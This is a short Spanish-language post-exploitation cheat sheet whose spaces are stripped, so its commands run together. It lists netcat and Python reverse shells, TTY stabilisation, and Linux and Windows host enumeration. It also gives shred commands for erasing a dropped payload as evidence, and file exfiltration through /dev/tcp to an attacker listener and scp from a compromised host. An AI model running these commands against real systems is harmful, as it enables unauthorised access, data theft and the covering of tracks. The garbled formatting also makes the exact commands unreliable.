script/dev/null-cbash# Ctrl + Zsttyraw-echo;fgresetxtermexport TERM=xterm SHELL=bash# stty -a en tu terminal para ver configsttyrows<x>cols<y>
Reenviar simple bash
nc-lvnp<Port>nc<IPa><Port>-e/bin/bash
Python simple shell
python-c'import pty; pty.spawn("/bin/sh")'
Checkear
whoami# usernameid# user groupsifconfig# Config de red > IP correcta? contenedor?env# variables de entorno > Contenedor?uname-a# OS versionnetstat-an# Conexiones de redps-ef# Procesos activos
whoami # usernamever # OS versionipconfig /all # Configuración de redset # variables de entornonetstat -an # Conexiones de redtasklist # Procesos activos
Borrar evidencias:
shred-zun20-v<payload.php># Para qué quieres esto? Eres un blackhat?
# mediante cateocat<<file>>/dev/tcp/<IPa>/<port>nc-lvnp<port>><file>
SCP (ssh pwned)
scp<user>@<IPv>:/<directory>/<file># Copiar archivoscp-P<puerto><user>@<IPv>:/<directory>/<file># Si SSH no es p22scp-r<user>@<IPv>:/<directory># Copiar directorio